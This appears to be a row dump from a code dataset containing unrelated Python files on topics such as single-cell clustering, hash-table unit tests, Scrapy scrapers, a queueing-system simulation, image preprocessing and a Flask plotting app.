text stringlengths 8 6.05M |
|---|
#!bin/python3
import csv
import gzip
import os
import scipy.io
matrix_dir = "H:\\SingleCell\\smc009\\filtered_feature_bc_matrix\\"
mat = scipy.io.mmread(os.path.join(matrix_dir, "matrix.mtx.gz"))
features_path = os.path.join(matrix_dir, "features.tsv.gz")
feature_ids = [row[0] for row in csv.reader(gzip.open(features_path, mode = 'rt'), delimiter="\t")]
gene_names = [row[1] for row in csv.reader(gzip.open(features_path, mode = 'rt'), delimiter="\t")]
feature_types = [row[2] for row in csv.reader(gzip.open(features_path, mode = 'rt'), delimiter="\t")]
barcodes_path = os.path.join(matrix_dir, "barcodes.tsv.gz")
barcodes = [row[0] for row in csv.reader(gzip.open(barcodes_path), mode = 'rt', delimiter="\t")]
mat1 = pd.DataFrame.sparse.from_spmatrix(mat)
mat1.columns = barcodes
mat1.index = gene_names
mat1_transpose = mat1.transpose()
mat1_transpose.loc[["cluster_id"]]
mat1_t_del = mat1_transpose.drop('cluster_id', axis=0)
kmeans1 = KMeans(n_clusters = 30, random_state=0).fit(mat1_t_del)
mat1_t_del['cluster_id'] = kmeans1.labels_
mat1_t_del[mat1_t_del['cluster_id'] == 1].loc[:, mat1_t_del.columns != 'cluster_id'].sum(axis=1)
mat1_t_del[mat1_t_del['cluster_id'] == 1].loc[:, mat1_t_del.columns != 'cluster_id'].sum(axis=0)
cl1sum = mat1_t_del[mat1_t_del['cluster_id'] == 1].loc[:, mat1_t_del.columns != 'cluster_id'].sum(axis=0)
n=0
for clsnum in range(len(mat1_t_del['cluster_id'].unique())-1):
n+=1
clsname = "cl%ssum"%(n-1)
print(clsname, n)
vars()[clsname] = mat1_t_del[mat1_t_del['cluster_id'] == n].loc[:, mat1_t_del.columns != 'cluster_id'].sum(axis=0)
n=0
for clsnum in range(len(mat1_t_del['cluster_id'].unique())-1):
n+=1
clsname = "cl%ssum"%(n-1)
print("%s.sort_values(ascending = False).head(50)"%clsname)
cl0sum.sort_values(ascending = False).head(50)
cl1sum.sort_values(ascending = False).head(50)
cl2sum.sort_values(ascending = False).head(50)
cl3sum.sort_values(ascending = False).head(50)
cl4sum.sort_values(ascending = False).head(50)
cl5sum.sort_values(ascending = False).head(50)
cl6sum.sort_values(ascending = False).head(50)
cl7sum.sort_values(ascending = False).head(50)
cl8sum.sort_values(ascending = False).head(50)
cl9sum.sort_values(ascending = False).head(50)
cl10sum.sort_values(ascending = False).head(50)
cl11sum.sort_values(ascending = False).head(50)
cl12sum.sort_values(ascending = False).head(50)
cl13sum.sort_values(ascending = False).head(50)
cl14sum.sort_values(ascending = False).head(50)
cl15sum.sort_values(ascending = False).head(50)
cl16sum.sort_values(ascending = False).head(50)
cl17sum.sort_values(ascending = False).head(50)
cl18sum.sort_values(ascending = False).head(50)
cl19sum.sort_values(ascending = False).head(50)
cl20sum.sort_values(ascending = False).head(50)
cl21sum.sort_values(ascending = False).head(50)
cl22sum.sort_values(ascending = False).head(50)
cl23sum.sort_values(ascending = False).head(50)
cl24sum.sort_values(ascending = False).head(50)
cl25sum.sort_values(ascending = False).head(50)
cl26sum.sort_values(ascending = False).head(50)
cl27sum.sort_values(ascending = False).head(50)
cl28sum.sort_values(ascending = False).head(50)
mat1.to_csv("H:\\SingleCell\\smc009\\smc009matrix_featurebarcode.csv")
"""
features_file = csv.reader(gzip.open(features_path, mode = 'rt'), delimiter="\t")
feature_ids = [row[0] for row in features_file]
gene_names = [row[1] for row in features_file]
feature_types = [row[2] for row in features_file]
barcodes_path = os.path.join(matrix_dir, "barcodes.tsv.gz")
barcodes = [row[0] for row in csv.reader(gzip.open(barcodes_path, mode = 'rt'), delimiter="\t")]
feature_ids = [row[0] for row in csv.reader(gzip.open(features_path), delimiter="\t")]
gene_names = [row[1] for row in csv.reader(gzip.open(features_path), delimiter="\t")]
feature_types = [row[2] for row in csv.reader(gzip.open(features_path), delimiter="\t")]
barcodes_path = os.path.join(matrix_dir, "barcodes.tsv.gz")
barcodes = [row[0] for row in csv.reader(gzip.open(barcodes_path), delimiter="\t")]
"""
|
#Test Universal Hash Table
import unittest, pdb
from universalhash import UniversalHash
class Test_Hash(unittest.TestCase):
def setUp(self):
self.test_table = UniversalHash(100)
def test_get_prime(self):
next_prime = self.test_table._get_prime(42)
next_prime2 = self.test_table._get_prime(502)
self.assertEqual(next_prime, 43)
self.assertEqual(next_prime2, 503)
def test_hashfunc(self):
self.test_table.p = 119
self.test_table.a = .6667
self.test_table.b = 11
testhash = 21
test_value = ((round(self.test_table.a*testhash+self.test_table.b))%self.test_table.p)%self.test_table.size
hash_val = self.test_table.hash_func(testhash)
self.assertEqual(test_value, hash_val)
def test_getitem(self):
self.test_table = UniversalHash(1000)
with self.assertRaises(KeyError):
self.test_table[19]
self.test_table[26] = "James"
self.assertEqual(self.test_table[26], "James")
def test_deleteitem(self):
self.test_table = UniversalHash(10)
self.test_table[300] = "Laura"
self.test_table[2201] = "Ted"
self.test_table[26] = "Jillian"
self.test_table.delete_item(26)
hashv = self.test_table.hash_func(26)%10
self.assertEqual(self.test_table.hashtable[hashv][0], "DEL")
def test_len(self):
self.test_table = UniversalHash(10)
self.test_table[300] = "Laura"
self.test_table[2201] = "Ted"
self.test_table[26] = "Jillian"
self.assertEqual(self.test_table.length, 3)
def test_keys_vals(self):
self.test_table = UniversalHash(10)
self.test_table[300] = "Laura"
self.test_table[2201] = "Ted"
self.test_table[26] = "Jillian"
self.assertIn(300, self.test_table.keys)
self.assertIn(2201, self.test_table.keys)
self.assertIn(26, self.test_table.keys)
self.assertIn("Laura", self.test_table.values)
self.assertIn("Ted", self.test_table.values)
self.assertIn("Jillian", self.test_table.values)
if __name__ =='__main__':
unittest.main()
|
#Finding the nature of the roots and the roots of a quadratic equation
import math
a=input ("Enter the coefficient of x2:")
b=input ("Enter the coefficient of x:")
c=input ("Enter the coefficient of constant:")
D = b**2 - 4*a*c
if D > 0:
print "Real and unequal roots"
if D>0:
x = (-1*b + D**0.5) / (2*a)
y = (-1*b - D**0.5) / (2*a)
elif D == 0:
x = (-1*b + D**0.5) / (2*a)
y = (-1*b - D**0.5) / (2*a)
print "The roots of the quadratic equation are:",x,y
elif D == 0:
print "Real and equal roots"
if D>0:
x = (-1*b + D**0.5) / (2*a)
y = (-1*b - D**0.5) / (2*a)
elif D == 0:
x = (-1*b + D**0.5) / (2*a)
y = (-1*b - D**0.5) / (2*a)
print "The roots of the quadratic equation are:",x,y
else:
print "Real roots do not exist"
|
#!/usr/bin/python3
import os
import sys
printFiles = False
query = -1
if len(sys.argv) == 1:
printFiles = True
else:
query = int(sys.argv[1])
mru_path = os.path.expanduser("~/.vim_mru_files")
if not os.path.exists(mru_path):
mru_path = "/mnt/c/Users/Peter/.vim_mru_files"
with open(mru_path) as f:
read = f.readlines()
lastfile = read[1].split(".")[-1]
print("lastfile : {}".format( lastfile ))
if "py" in lastfile:
print ("read[1]")
os.system("python3 {}".format(os.path.expanduser(read[1])))
else:
print ("read[]")
print (read[1])
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
import MySQLdb
from scrapy.exceptions import NotConfigured
class RadiosyncPipeline(object):
def __init__(self, db, user, passwd, host):
self.db = db
self.user = user
self.passwd = passwd
self.host = host
@classmethod
def from_crawler(cls, crawler):
db_settings = crawler.settings.getdict("DB_SETTINGS")
if not db_settings:
raise NotConfigured
db = db_settings['db']
user = db_settings['user']
passwd = db_settings['passwd']
host = db_settings['host']
return cls(db, user, passwd, host)
def open_spider(self, spider):
self.conn = MySQLdb.connect(db=self.db,
user=self.user, passwd=self.passwd,
host=self.host,
charset='utf8', use_unicode=True)
self.cursor = self.conn.cursor()
def process_item(self, item, spider):
sql = "INSERT INTO r01radio_copy (directory,radio_name,address,country,genres,language,phone,email,website,logo,stream_link) VALUES (%s, %s, %s,%s, %s, %s,%s, %s, %s,%s, %s)"
self.cursor.execute(sql,
(
item.get("directory"),
item.get("radio_name"),
item.get("address"),
item.get("country"),
item.get("genres"),
item.get("language"),
item.get("phone"),
item.get("email"),
item.get("website"),
item.get("images")[0]['path'],
item.get("stream_link")
)
)
self.conn.commit()
return item
def close_spider(self, spider):
self.conn.close()
class ImageJsonPipeline(object):
def process_item(self,item,spider):
if item['images']:
item['images'] = item['images'][0]['path']
return item |
import scrapy
from scrapy.http import Request
class CombineSpider(scrapy.Spider):
handle_httpstatus_list = [404]
name = 'combine'
allowed_domains = ['nflcombineresults.com']
start_urls = ['https://nflcombineresults.com/nflcombinedata.php?year={}&pos=&college='
.format([str(x) for x in range(1987, 2021)][i]) for i in range(33)]
def parse(self, response):
hrefs = response.xpath('//*[contains(@href,"playerpage")]/@href').re('(?<=https://nflcombineresults.com/).+')
for player in hrefs:
players = 'https://nflcombineresults.com/' + player
yield Request(players, callback=self.parse_player)
def parse_player(self, response):
first_name = response.xpath('//tr[contains(.,"First Name")]/td[2]/text()').re(r'\w+')
last_name = response.xpath('//tr[contains(.,"Last Name")]/td[2]/text()').re(r'\w+')
draft_year = response.xpath('//tr[contains(.,"Draft Class")]/td[2]/text()')[0].re(r'\d+')
college = response.xpath('//tr[contains(.,"College")]/td[2]/text()').re(r'\w+')
position = response.xpath('//tr[contains(.,"Position")]/td[2]/text()')[0].re(r'\w+')
height = response.xpath('//tr[contains(.,"Height")]/td[2]/text()')[0].re(r'\d+')
weight = response.xpath('//tr[contains(.,"Weight")]/td[2]/text()')[0].re(r'\d+')
bmi = response.xpath('//tr[contains(.,"BMI")]/td[2]/text()')[0].re(r'\d+.\d+')
arm_length = response.xpath('//tr[contains(.,"Arm Length")]/td[2]/text()')[0].re(r'\d+.\d+')
hand_size = response.xpath('//tr[contains(.,"Hand Size")]/td[2]/text()')[0].re(r'\d+.\d+')
wing_span = response.xpath('//tr[contains(.,"Wingspan")]/td[2]/text()')[0].re(r'\d+.\d+')
forty_yard_dash = response.xpath('//tr[contains(.,"40 Yard Dash")]/td[2]/text()')[0].re(r'\d+.\d+')
forty_yard_mph = response.xpath('//tr[contains(.,"40 Yard (MPH)")]/td[2]/text()')[0].re(r'\d+.\d+')
twenty_yard_split = response.xpath('//tr[contains(.,"20 Yard Split")]/td[2]/text()')[0].re(r'\d+.\d+')
bench = response.xpath('//tr[contains(.,"Bench Press")]/td[2]/text()')[0].extract()
qb_ball_velocity = response.xpath('//tr[contains(.,"QB Ball Velocity")]/td[2]/text()')[0].extract()
vertical_leap = response.xpath('//tr[contains(.,"Vertical Leap")]/td[2]/text()')[0].re(r'\d+.\d+')
broad_jump = response.xpath('//tr[contains(.,"Broad Jump")]/td[2]/text()')[0].re(r'\d+.\d+')
twenty_yrd_shuttle = response.xpath('//tr[contains(.,"20 Yd Shuttle")]/td[2]/text()')[0].re(r'\d+.\d+')
three_cone = response.xpath('//tr[contains(.,"Three Cone")]/td[2]/text()')[0].re(r'\d+.\d+')
yield {'First Name': first_name,
'Last Name': last_name,
'Draft Year': draft_year,
'College': college,
'Position': position,
'Height (inch)': height,
'Weight (lbs)': weight,
'BMI': bmi,
'ArmLength (inch)': arm_length,
'Hand Size (inch)': hand_size,
'Wing Span (inch)': wing_span,
'40 Yard Dash (s)': forty_yard_dash,
'40 Yard (MPH)': forty_yard_mph,
'20 Yard Split (s)': twenty_yard_split,
'Bench Press': bench,
'QB Ball Velocity': qb_ball_velocity,
'Vertical Leap (inch)': vertical_leap,
'Broad Jump (inch)': broad_jump,
'20 Yd Shuttle (s)': twenty_yrd_shuttle,
'Three Cone': three_cone
}
|
# Использование МЦ для анализа систем массового обслуживания
# Поступвишие заявки с систему при заполненном буфере отбрасываются
import numpy as np
import math
import matplotlib.pyplot as plt
# Parameters
b = 2 # Размер буфера
l_input = np.arange(0.1, 2.0, 0.05)
T = 1 # Время обслуживания системы
num_windows = 100000 # Кол-во окон для моделирования
V = np.array([0 for i in range(num_windows)], dtype=int) # Число заявок, поступивших в систему в определённом окне.
N = np.array([0 for j in range(num_windows)], dtype=int) # Число заявок, находящихся в определённом окне
# Построение графиков (Если что, то нужно будет доделать (Распеделение по X)
def create_graphics(exp, teor, y_des="Ось Y"):
plt.figure()
plt.plot(l_input, exp, color="blue", label="Эксперимент")
plt.plot(l_input, teor, color="red", label="Теория")
plt.xlabel("Лямбда входное")
plt.ylabel(y_des)
plt.grid(True)
plt.xkcd(True)
plt.legend()
plt.show()
# Пуассоновский входной поток (показывает вероятность поступления i-ого кол-ва заявок в систему при интенсивности входного потока lamb)
def poisson_input_stream(i, lamb):
# i - Кол-во заявок, поступивших в систему в определённос окне
return (((lamb ** i) / math.factorial(i)) * math.exp(-lamb))
# Математическое ожидание от числа заявок (абонентов, т.к. у каждого абона может быть только 1 заявка)
def mat_og(p):
# p - вероятность по стационарному распределению
summa = 0
for i in range(b + 1):
summa += i * p[i]
return summa
# Средняя задержка по теореме Литла
def little(n, lamb_out):
#if lamb_out == 0:
# lamb_out = 0.00000001
return n / lamb_out
# Создание матрицы переходов по МЦ (Вероятность переходов сильно зависит от входного потока) (Работает на ура!)
def create_transition_matrix(lamb):
# lamb - интенсивность входного потока
tm = np.array([[0.0 for i in range(b + 1)] for i in range(b + 1)], dtype=float)
check_sum = np.array([0.0 for i in range(b + 1)], dtype=float)
check_sum2 = np.array([0.0 for i in range(b + 1)], dtype=float)
num_not_null_elements = np.array([0 for i in range(b + 1)], dtype=int) # Кол-во ненулевых элементов в строке
for i in range(len(tm)):
v = 0 # Кол-во сообщений, пришедших в конкретное окно
for j in range(len(tm[i])):
if i < (j + 2):
tm[i][j] = poisson_input_stream(v, lamb) # Вероятность перехода МЦ из состояния i в состояние j
v += 1
num_not_null_elements[i] += 1
check_sum[i] += tm[i][j]
# print(check_sum)
# Значение, которое не было добрано до суммы делим поровну между всеми вероятностями.
for i in range(len(tm)):
for j in range(len(tm[i])):
if i < (j + 2):
tm[i][j] = tm[i][j] + ((1.0 - check_sum[i]) / num_not_null_elements[i])
if i == len(tm) - 1 & j == len(tm[i]) - 1:
tm[i][j] = 0.0
tm[i][j - 1] = 1.0
check_sum2[i] += tm[i][j]
# print(check_sum2)
return tm
# Стационарное распределение для теоретического расчёта
def fsd(tm):
sd = np.linalg.matrix_power(tm, num_windows)
return sd[0]
# Приход заявок
def input_messege(lamb):
windows = np.array([poisson_input_stream(i, lamb) for i in range(20)])
w = np.array([0.0 for i in range(len(windows))])
s = 0
for i in range(len(windows)):
s += windows[i]
w[i] = s
r = np.random.random()
for i in range(len(w)):
if r < w[i]:
return i
def theor_l_out(sd):
summa = 0
for i in range(1, len(sd) - 1):
summa += sd[i]
return summa
# Подсчёт задержки
def count_delay(v, n):
# v - кол-во поступивших сообщений
# n - кол-во сообщений в буфере
return min(max((n + v) - 1, 0), b)
def experiment():
print("Эксперимент")
E_N = np.array([0.0 for i in range(len(l_input))], dtype=float) # Среднее кол-во заявок (Абонентов в системе)
E_D = np.array([0.0 for i in range(len(l_input) // 2 - 1)], dtype=float) # Среднее время задержки заявки в системе
l_out = np.array([0.0 for i in range(len(l_input))], dtype=float) # Интенсивность выходного потока
for lamb in range(len(l_input)):
e_N = 0 # Среднее кол-во заявок в системе в определённый момент времени
num_out_message = 0
e_D = 0
for i in range(num_windows - 1):
V[i] = input_messege(l_input[lamb])
N[i + 1] = min(max(N[i] - 1, 0) + V[i], b)
e_N += N[i]
e_D += count_delay(V[i], N[i])
if max(N[i], 0) != 0:
num_out_message += 1
E_N[lamb] = e_N / num_windows
l_out[lamb] = num_out_message / num_windows
if l_input[lamb] < 1.0:
#E_D[lamb] = e_D / num_out_message + 0.5
E_D[lamb] = little(E_N[lamb], l_out[lamb]) + 0.5
return E_N, E_D, l_out
def theory():
print("Теория")
E_N = np.array([0.0 for i in range(len(l_input))], dtype=float) # Среднее кол-во заявок (Абонентов в системе)
E_D = np.array([0.0 for i in range(len(l_input) // 2 - 1)], dtype=float) # Среднее время задержки заявки в систме
l_out = np.array([0.0 for i in range(len(l_input))], dtype=float) # Интенсивность выходного потока
for lamb in range(len(l_input)):
tm = create_transition_matrix(l_input[lamb]) # Матрица переходов
sd = fsd(tm) # Стационарное распределение системы
E_N[lamb] = mat_og(sd) # Математическое ожидание
l_out[lamb] = theor_l_out(sd)
#E_D[lamb] = little(E_N[lamb], l_out[lamb])
if l_input[lamb] < 1.0:
E_D[lamb] = (3 - 2 * l_input[lamb]) / (2 * (1 - l_input[lamb]))
return E_N, E_D, l_out
def create_graphics_out(exp, y_des="Ось Y"):
plt.figure()
plt.plot(l_input, exp, color="blue", label="Эксперимент")
#plt.plot(l_input, teor, color="red", label="Теория")
plt.xlabel("Лямбда входное")
plt.ylabel(y_des)
plt.grid(True)
plt.xkcd(True)
plt.legend()
plt.show()
def create_graphics_D(exp, teor, y_des="Ось Y"):
plt.figure()
l = np.array([l_input[i] for i in range(len(l_input) // 2 - 1)], dtype=float) # Среднее время задержки заявки в системе
plt.plot(l, exp, color="blue", label="Эксперимент")
plt.plot(l, teor, color="red", label="Теория")
plt.xlabel("Лямбда входное")
plt.ylabel(y_des)
plt.grid(True)
plt.xkcd(True)
plt.legend()
plt.show()
exp_E_N, exp_E_D, exp_l_out = experiment()
teor_E_N, teor_E_D, teor_l_out = theory()
create_graphics_out(exp_l_out, y_des="Интенсивность выходного потока")
create_graphics(exp_E_N, teor_E_N, y_des="Среднее кол-во абонентов в системе")
create_graphics_D(exp_E_D, teor_E_D, y_des="Среднее время нахождения заявки в системе")
print(exp_l_out)
|
A=int(input("A= "))
B=int(input("B= "))
C=int(input("C= "))
print(A<B<C or A>B>C) |
# Filename: MetaData.py
# Author: Brian Lach (July 10, 2020)
# Purpose: Provides info about entity metadata types and how to serialize/unserialize them.
from panda3d.core import LVecBase3f, LVecBase2f, LVecBase4f, CKeyValues
from bsp.leveleditor.fgdtools import FgdEntityProperty
from bsp.leveleditor import LEUtils
MetaDataExclusions = [
'id',
'classname',
'visgroup'
]
# (type, unserialize func, serialize func, default value)
MetaDataType = {
'string': (str, str, str, ""),
'decal': (str, str, str, ""),
'sound': (str, str, str, ""),
'float': (float, float, str, 0.0),
'color255': (LVecBase4f, CKeyValues.to4f, CKeyValues.toString, LVecBase4f(255, 255, 255, 255)),
'vec3': (LVecBase3f, CKeyValues.to3f, CKeyValues.toString, LVecBase3f(0, 0, 0)),
'vec4': (LVecBase4f, CKeyValues.to4f, CKeyValues.toString, LVecBase4f(0, 0, 0, 0)),
'vec2': (LVecBase2f, CKeyValues.to2f, CKeyValues.toString, LVecBase2f(0, 0)),
'integer': (int, int, str, 0),
'choices': (int, int, str, 0),
'flags': (int, int, str, 0),
'studio': (str, str, str, ""),
'target_source': (str, str, str, ""),
'target_destination': (str, str, str, ""),
'target_destinations': (str, str, str, ""),
'boolean': (bool, LEUtils.strToBool, LEUtils.boolToStr, False)
}
def getMetaDataType(valueType):
return MetaDataType[valueType]
def getNativeType(typeName):
return MetaDataType[typeName][0]
def getUnserializeFunc(typeName):
return MetaDataType[typeName][1]
def getSerializeFunc(typeName):
return MetaDataType[typeName][2]
def getDefaultValue(typeName):
return MetaDataType[typeName][3]
def isPropertyExcluded(propName):
return propName in MetaDataExclusions
|
SOCKET_ID_RECOGNITION = 'id_recognition'
SOCKET_ID_JOYSTICK = 'id_joystick'
SOCKET_ID_VEHICLE = 'id_vehicle'
SOCKET_ID_FAKE = 'id_fake'
SOCKET_ID_APPROVED = 'id_approved'
SOCKET_ERR_UNKNOWN_CMD = 'unknown_cmd'
SOCKET_DISCONNECT = 'disconnect'
SOCKET_BROADCAST_ALL = 'broadcast_all'
SOCKET_EOL = '<|>'
SOCKET_JOY_FORWARD = 'joy_forward'
SOCKET_JOY_BACKWARD = 'joy_backward'
SOCKET_JOY_NEUTRAL = 'joy_neutral'
SOCKET_JOY_DIR_LEFT = 'joy_dir_left'
SOCKET_JOY_DIR_RIGHT = 'joy_dir_right'
SOCKET_JOY_DIR_NEUTRAL = 'joy_dir_neutral'
SOCKET_RECOGNITION_DETECTED = 'recognition_detected'
SOCKET_RECOGNITION_FREE = 'recognition_free'
|
import getopt, sys
import urllib2
def pull_prediction(duration):
# Pulling DrAFTS's prediction for us-west-2 m3.medium instance type
url = 'http://128.111.84.183/us-east-1-m3.medium.html'
f = urllib2.urlopen(url)
for line in f:
if line.startswith('x: ['):
x = [float(i) for i in line[4:-3].split(', ')]
elif line.startswith('y: ['):
y = [float(j) for j in line[4:-3].split(', ')]
i = 0
while (float(x[i]) < float(duration)):
i += 1
return y[i]
#def initial_setup(x, k=1):
# Setup master node (balancer)
def usage():
s = """
Usage: ./predict_price.py -d [time duration (in hours)] -b [budget limit (in dollars)]
"""
print s
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], 'hd:b:', ["help", "duration=", "budget="])
except getopt.GetoptError as err:
print str(err)
usage()
sys.exit(2)
for o, a in opts:
if o in ['-h', '--help']:
usage()
sys.exit()
elif o in ['-d', '--duration']:
duration = a
elif o in ['-b', '--budget']:
budget = a
else:
assert False, "unhandled option"
pred = pull_prediction(duration)
print str(pred)
#if __name__ == '__main__':
# main()
|
inputList =[]
listElementCount=[]
flag="false"
allowedvalues=['m','z','c','p','s']
inp1=raw_input("enter input:")
inputString=str(inp1)
for i in inputString:
inputList +=i
for i in inputString:
if i in allowedvalues:
flag="true"
else:
flag="false"
print("The input provided is not acceptable, please re-run with proper input")
break
if flag == "true" :
for i in inputList:
count=inputList.count(i)
b=inputList.index(i)
listElementCount.append(count)
print i, count
minCount=min(listElementCount)
print("No of Unique Teams formed")
print(minCount)
|
import os
import numpy as np
from PIL import Image
def load_data():
# 标签 四个方向margin 顺时针顺序 左上右下
y_train = []
with open(os.path.join('data', 'margin.txt')) as file:
lines = file.readlines()
for line in lines:
line = line.strip('\n').strip('[').strip(']') # 去掉前后[]和换行符
line = line.split(',') # str to list
line = list(map(int, line))
y_train.append(line)
y_train = np.array(y_train)
# 打开所有图片存入images 还未缩放大小
# 缩放每张图大小到224*224 VGG16输入尺寸 并且对应调整margin数值
data_folder_path = os.path.join('data', 'data_covered') # 数据集路径
files = os.listdir(data_folder_path) # 遍历所有图片
files.sort()
x_train = []
i = 0
for file in files:
path = os.path.join(data_folder_path, file)
image = Image.open(path)
width, height = image.size[0], image.size[1]
width_ratio = 224 / width
height_ratio = 224 / height
y_train[i][0] = y_train[i][0] * width_ratio
y_train[i][2] = y_train[i][2] * width_ratio
y_train[i][1] = y_train[i][1] * height_ratio
y_train[i][3] = y_train[i][3] * height_ratio
# 缩放image
image = image.resize((224, 224), Image.ANTIALIAS)
pixel = np.asanyarray(image)
# pixel = np.asarray(image)
x_train.append(pixel)
i = i + 1
x_train = np.array(x_train)
# x_train = []
# for i in range(len(images)):
# image = images[i]
# # 调整margin
# width, height = image.size[0], image.size[1]
# width_ratio = 224 / width
# height_ratio = 224 / height
# y_train[i][0] = y_train[i][0] * width_ratio
# y_train[i][2] = y_train[i][2] * width_ratio
# y_train[i][1] = y_train[i][1] * height_ratio
# y_train[i][3] = y_train[i][3] * height_ratio
# # 缩放image
# image = image.resize((224, 224), Image.ANTIALIAS)
# pixel = np.asanyarray(image)
# x_train.append(pixel)
# x_train = np.array(x_train)
# 使用YOLO_v1方式定义损失函数
# 先处理margin数据 将四个margin转换为 x,y,w,h
for i in range(y_train.shape[0]):
[m0, m1, m2, m3] = y_train[i]
y_train[i] = [(224 - m2 + m0) / 2, (224 - m3 + m1) / 2, 224 - m2 - m0, 224 - m3 - m1]
# 归一化
x_train = x_train / 255.0
y_train = y_train / 224.0
return x_train, y_train
|
import warnings
import numpy as numpy
from skimage import morphology
from scipy import ndimage
def remove_small_objects(mask, small_objects=0, small_holes=0):
"""
Removes small objects (white areas of mask) and small holes (black areas).
Parameters
----------
mask : 2D array of bool
Mask showing the area of one phase.
small_objects : int
Max area of connected white pixels that will be removed.
small_holes : int
Max area of connected black pixels that will be removed.
Returns
-------
out_mask : 2D array of bool
Mask with small holes and objects removed.
"""
with warnings.catch_warnings():
warnings.simplefilter("ignore")
out_mask = morphology.remove_small_objects(mask, small_objects)
out_mask = ~morphology.remove_small_objects(~out_mask, small_holes)
return out_mask
def smooth_edges(mask, smooth_radius=1):
"""
Smoothes the edges of a binary mask.
Parameters
----------
mask : 2D array of bool
Mask showing the area of one phase.
smooth_radius : float64
The radius of the smoothing operation. See note below.
Returns
-------
smooth_mask : 2D array of bool
Mask that has been smoothed.
Notes
-----
smooth_radius sets the structure element (selem) for smoothing the edges of
the masks. If the smooth_rad rounds up the selem is a disk with radius
rounded up. If smooth_radius rounds down, selem is a box.
Radius = 0 - 1.499
[[1,1,1],
[1,1,1],
[1,1,1]]
Radius = 1.5 - 1.99
[[0,0,1,0,0],
[0,1,1,1,0],
[1,1,1,1,1],
[0,1,1,1,0],
[0,0,1,0,0]]
Radius = 2 - 2.499
[[1,1,1,1,1],
[1,1,1,1,1],
[1,1,1,1,1],
[1,1,1,1,1],
[1,1,1,1,1]]
"""
smooth_radius = max(smooth_radius, 1)
if round(smooth_radius, 0) > int(smooth_radius): # If round up.
size = int(smooth_radius + 1)
selem = morphology.disk(round(smooth_radius,0))
else:
size = 1 + 2*int(smooth_radius)
selem = np.ones((size,size))
# Smooth edges.
smooth_mask = ndimage.binary_opening(mask, structure=selem)
smooth_mask = ndimage.binary_closing(smooth_mask, structure=selem)
return smooth_mask
|
import torch
from torchvision.transforms import transforms
from transforms import ConvertBCHWtoCBHW
class VideoClassificationPresetTrain:
def __init__(
self,
*,
crop_size,
resize_size,
mean=(0.43216, 0.394666, 0.37645),
std=(0.22803, 0.22145, 0.216989),
hflip_prob=0.5,
):
trans = [
transforms.ConvertImageDtype(torch.float32),
# We hard-code antialias=False to preserve results after we changed
# its default from None to True (see
# https://github.com/pytorch/vision/pull/7160)
# TODO: we could re-train the video models with antialias=True?
transforms.Resize(resize_size, antialias=False),
]
if hflip_prob > 0:
trans.append(transforms.RandomHorizontalFlip(hflip_prob))
trans.extend([transforms.Normalize(mean=mean, std=std), transforms.RandomCrop(crop_size), ConvertBCHWtoCBHW()])
self.transforms = transforms.Compose(trans)
def __call__(self, x):
return self.transforms(x)
class VideoClassificationPresetEval:
def __init__(self, *, crop_size, resize_size, mean=(0.43216, 0.394666, 0.37645), std=(0.22803, 0.22145, 0.216989)):
self.transforms = transforms.Compose(
[
transforms.ConvertImageDtype(torch.float32),
# We hard-code antialias=False to preserve results after we changed
# its default from None to True (see
# https://github.com/pytorch/vision/pull/7160)
# TODO: we could re-train the video models with antialias=True?
transforms.Resize(resize_size, antialias=False),
transforms.Normalize(mean=mean, std=std),
transforms.CenterCrop(crop_size),
ConvertBCHWtoCBHW(),
]
)
def __call__(self, x):
return self.transforms(x)
|
from flask import Flask, render_template, send_file
import queries
app = Flask(__name__)
@app.route('/')
def home():
return render_template('home.html')
@app.route('/hello.html')
def hello_world():
return render_template('hello.html')
@app.route('/first.html')
def first():
return render_template('first.html')
@app.route('/first.png')
def first_plot():
graph_1 = queries.get_query1()
return send_file(graph_1, mimetype='image/png', cache_timeout=0)
# @app.route('/second.html')
# def second():
# return render_template('second.html')
#
#
# @app.route('/second.png')
# def second_plot():
# graph_2 = queries.get_query2()
# return send_file(graph_2, mimetype='image/png', cache_timeout=0)
@app.route('/third.html')
def third():
return render_template('third.html')
@app.route('/third.png')
def third_plot():
graph_3 = queries.get_query3()
return send_file(graph_3, mimetype='image/png', cache_timeout=0)
# @app.route('/fourth.html')
# def fourth():
# return render_template('fourth.html')
#
#
# @app.route('/fourth.png')
# def fourth_plot():
# graph_4 = queries.get_query4()
# return send_file(graph_4, mimetype='image/png', cache_timeout=0)
@app.route('/sixth.html')
def sixth():
return render_template('sixth.html')
@app.route('/sixth.png')
def sixth_plot():
graph_6 = queries.get_query6()
return send_file(graph_6, mimetype='image/png', cache_timeout=0)
@app.route('/seventh.html')
def seventh():
return render_template('seventh.html')
@app.route('/seventh.png')
def seventh_plot():
graph_7 = queries.get_query7()
return send_file(graph_7, mimetype='image/png', cache_timeout=0)
@app.route('/eighth.html')
def eighth():
return render_template('eighth.html')
@app.route('/eighth.png')
def eighth_plot():
graph_8 = queries.get_query8()
return send_file(graph_8, mimetype='image/png', cache_timeout=0)
@app.route('/ninth.html')
def ninth():
return render_template('ninth.html')
@app.route('/ninth.png')
def ninth_plot():
graph_9 = queries.get_query9()
return send_file(graph_9, mimetype='image/png', cache_timeout=0)
# @app.route('/tenth.html')
# def tenth():
# return render_template('tenth.html')
#
#
# @app.route('/tenth.png')
# def tenth_plot():
# graph_10 = queries.get_query10()
# return send_file(graph_10, mimetype='image/png', cache_timeout=0)
# @app.route('/eleven.html')
# def eleven():
# return render_template('eleven.html')
#
#
# @app.route('/eleven.png')
# def eleven_plot():
# graph_11 = queries.get_query11()
# return send_file(graph_11, mimetype='image/png', cache_timeout=0)
@app.route('/twelve.html')
def twelve():
return render_template('twelve.html')
@app.route('/twelve.png')
def twelve_plot():
graph_12 = queries.get_query12()
return send_file(graph_12, mimetype='image/png', cache_timeout=0)
@app.route('/thirteen.html')
def thirteen():
return render_template('thirteen.html')
@app.route('/thirteen.png')
def thirteen_plot():
graph_13 = queries.get_query13()
return send_file(graph_13, mimetype='image/png', cache_timeout=0)
@app.route('/fourteen.html')
def fourteen():
return render_template('fourteen.html')
@app.route('/fourteen.png')
def fourteen_plot():
graph_14 = queries.get_query14()
return send_file(graph_14, mimetype='image/png', cache_timeout=0)
# @app.route('/fifteen.html')
# def fifteen():
# return render_template('fifteen.html')
#
#
# @app.route('/fifteen.png')
# def fifteen_plot():
# graph_15 = queries.get_query15()
# return send_file(graph_15, mimetype='image/png', cache_timeout=0)
# @app.route('/sixteen.html')
# def sixteen():
